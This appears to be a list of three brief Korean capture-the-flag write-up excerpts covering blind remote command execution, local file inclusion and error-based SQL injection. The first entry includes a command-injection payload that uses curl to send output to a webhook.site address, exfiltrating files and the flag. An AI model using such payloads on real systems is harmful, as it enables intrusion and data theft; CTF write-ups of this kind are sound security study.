May 19, 2025
문제 개요 GET 파라미터 를 로 실행하지만 반환값을 출력하지 않습니다. 결과가 화면에 보이지 않는 Blind RCE 상황입니다. 취약점 분석 익스플로잇 절차 웹훅 준비 등에서 개인 URL을 발급받습니다. 플래그 위치 ?cmd=curl+-s+https://webhook.site/ 입력시 파일 디렉토리가 뜸을 확인 할 수 있습니다. 플래그 유출 핵심 …
May 19, 2025
문제 개요 세션 쿠키를 발급받은 뒤 의 include 구문으로 LFI가 가능합니다. 취약점 분석 익스플로잇 절차 로그인하여 확보 LFI 확인 플래그 확인 핵심 포인트 디렉터리 트래버설로 루트 경로 접근 가능 여부를 확인합니다.
May 19, 2025
문제 개요 SQL 오류 메시지가 그대로 노출되어 Error‑based SQL Injection이 가능합니다. 취약점 분석 익스플로잇 절차 플래그 추출 길이 제한 시 로 분할하여 반복 요청합니다. 핵심 포인트 오류 메시지를 노출하는 구문이 있으면 Error‑based SQLi를 최우선으로 고려합니다.